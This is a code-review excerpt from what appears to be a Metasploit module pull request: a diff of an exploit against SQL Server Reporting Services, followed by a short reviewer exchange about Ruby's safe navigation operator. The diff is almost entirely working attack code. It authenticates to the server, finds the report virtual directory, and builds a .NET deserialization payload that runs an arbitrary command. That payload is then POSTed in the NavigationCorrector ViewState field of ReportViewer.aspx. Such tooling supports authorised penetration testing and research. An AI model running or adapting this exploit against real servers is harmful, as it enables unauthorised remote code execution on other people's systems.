modules/exploits/windows/http/ssrs_navcorrector_viewstate.rb

```diff
@@ -0,0 +1,110 @@
+          [ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 3000 } ]
+        ],
+      'DefaultTarget'  => 1,
+      'DisclosureDate' => '2020-02-11'))
+
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The base path to the web application', '/Reports' ]),
+      OptString.new('DOMAIN',    [ true, 'The domain to use for Windows authentication', 'WORKSTATION' ]),
+      OptString.new('USERNAME',  [ true, 'Username to authenticate as', '' ]),
+      OptString.new('PASSWORD',  [ true, 'The password to authenticate with' ])
+    ])
+    register_advanced_options([
+      OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),
+    ])
+  end
+
+  def send_api_request(*parts)
+    res = send_request_cgi({
+      'uri'       => normalize_uri(target_uri.path, 'api', 'v1.0', *parts),
+      'headers'   => {
+        'Accept'  => 'application/json',
+      },
+      'username'  => datastore['USERNAME'],
+      'password'  => datastore['PASSWORD']
+    })
+    if res && res.code == 200 && res.headers['Content-Type'].strip.start_with?('application/json;')
+      begin
+        return JSON.parse(res.body)
+      rescue JSON::PareError
+        print_error('Received invalid JSON body in an API response body')
+      end
+    end
+  end
+
+  def check
+    json_response = send_api_request('ReportServerInfo', 'Model.SiteName')
+    return CheckCode::Unknown unless json_response && json_response['value'] == 'SQL Server Reporting Services'
+    CheckCode::Detected
+  end
+
+  def exploit
+    fail_with(Failure::NotFound, 'Failed to detect the application') unless check == CheckCode::Detected
+
+    json_response = send_api_request('ReportServerInfo', 'Model.GetVirtualDirectory')
+    fail_with(Failure::UnexpectedReply, 'Failed to detect the report server virtual directory') if json_response.nil?
+    directory = json_response['value']
+    vprint_status("Detected the report server virtual directory as: #{directory}")
+
+    state = {vd: directory}
+    if target.arch.first == ARCH_CMD
+      execute_command(payload.encoded, state: state)
+    else
+      cmd_target = targets.select { |target| target.arch.include? ARCH_CMD }.first
+      execute_cmdstager({linemax: cmd_target.opts['Space'], delay: datastore['CMDSTAGER::DELAY'], state: state})
+    end
+  end
+
+  def execute_command(cmd, opts)
+    state = opts[:state]
+    viewstate = Rex::Text.encode_base64(::Msf::Util::DotNetDeserialization.generate(cmd))
+
+    res = send_request_cgi({
+      'uri'       => normalize_uri(state[:vd], 'Pages', 'ReportViewer.aspx'),
+      'method'    => 'POST',
+      'vars_post' => {
+        'NavigationCorrector$PageState' => 'NeedsCorrection',
+        'NavigationCorrector$ViewState' => viewstate,
+        '__VIEWSTATE'                   => ''
+      },
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD']
+    })
+
+    unless res&.code == 200
```

Comment:
Did you want to use the safe navigation operator in the rest of this code?

Reply:
Yeah I guess the check in `send_api_request` could use the same technique? I'll update it.